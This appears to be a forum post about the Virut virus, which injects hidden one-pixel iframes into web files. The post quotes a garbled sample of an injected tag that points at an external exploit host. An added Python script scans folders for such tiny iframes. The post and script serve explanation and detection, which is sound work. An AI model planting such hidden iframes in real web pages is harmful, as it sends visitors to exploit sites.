Virut adds one or more iFrame tags to any html file it finds to redirect users to an exploit site.
Edit any html file on the infected computer and you'll see something like this at the bottom:
<- iframe src="http://ZieF,pl/rc/" width=1 height=1 style="border:'<- / iframe>',0Dh,0Ah
Virut makes similar changes to other file types such as .PHP, .ASP and .HTM, and is very hard for scanners to detect. So FYI, don't bring web documents over in the backup when this infection finally brings you to your knees.
The most damning property of Virut is that it is polymorphic: it changes slightly with each replication, allowing some of the infected files to elude scanners. So if you scan your system with a boot CD repeatedly and follow up with a repair install, you may get Virut to lie low for a while, but there is likely a file somewhere on your machine that will inevitably be activated before long, starting the entire infection over again.
Trying to remove Virut is an effort in futility, which is why evilfantasy and virtually every other malware expert who has experience with this infection will tell you that your only option is to reformat and reinstall, and to be careful what you transfer from your previous installation.
But feel free to keep trying. You'll just end up learning the hard way like I did.
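A triage check for the injected tag described in the post, as an added example that is not part of the original post: it walks a backup folder and flags .html/.htm/.php/.asp files containing an iframe whose width and height are both at most 1 pixel. The sample files and the host `injected.example` are constructed, and the function names are this example's own; it only reports matches and says nothing about files it does not flag.

```python
import re
import tempfile
from pathlib import Path

WEB_EXTS = {".html", ".htm", ".php", ".asp"}
IFRAME_RE = re.compile(rb"<\s*iframe\b[^>]*>", re.IGNORECASE)
# width/height given as an attribute (width=1) or inside style (width:1px)
DIM_RE = re.compile(rb"\b(width|height)\s*[=:]\s*[\"']?\s*(\d+)", re.IGNORECASE)
SRC_RE = re.compile(rb"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)

def tiny_iframes(data, max_px=1):
    """Return src values of iframes whose width and height are both <= max_px."""
    hits = []
    for tag in IFRAME_RE.finditer(data):
        dims = {m.group(1).lower(): int(m.group(2))
                for m in DIM_RE.finditer(tag.group(0))}
        # A missing dimension defaults to a large value, so the tag is not flagged
        if dims.get(b"width", 999) <= max_px and dims.get(b"height", 999) <= max_px:
            src = SRC_RE.search(tag.group(0))
            hits.append(src.group(1).decode("latin-1") if src else "")
    return hits

def scan_tree(root):
    """Map each web file under root to the tiny-iframe sources found in it."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            found = tiny_iframes(path.read_bytes())
            if found:
                report[str(path.relative_to(root))] = found
    return report

def demo():
    # Constructed sample files; injected.example is a placeholder host
    clean = (b"<html><body><iframe src='map.html' width=600 height=400>"
             b"</iframe></body></html>")
    bad = clean + (b'\r\n<iframe src="http://injected.example/rc/" width=1 '
                   b'height=1 style="border:0"></iframe>\r\n')
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "index.html").write_bytes(clean)   # legitimate iframe only
        (Path(tmp) / "contact.PHP").write_bytes(bad)    # hidden iframe appended
        (Path(tmp) / "notes.txt").write_bytes(bad)      # not a web extension
        return scan_tree(tmp)

if __name__ == "__main__":
    for name, srcs in demo().items():
        print(name, srcs)
```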